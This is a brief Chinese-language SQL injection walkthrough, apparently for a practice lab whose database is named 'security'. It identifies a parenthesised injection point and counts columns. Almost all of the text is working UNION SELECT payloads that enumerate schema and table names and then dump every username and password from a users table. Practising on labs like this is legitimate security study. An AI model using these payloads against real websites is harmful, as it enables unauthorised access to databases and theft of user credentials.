判断注入类型。
?id=1'--+ 回显不正常 ?id=1')--+ 回显正常
带括号的数字型注入
判断有3列
?id=') union select 1,2,3 --+
union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
爆库名
union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
爆列名
union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
爆用户名和密码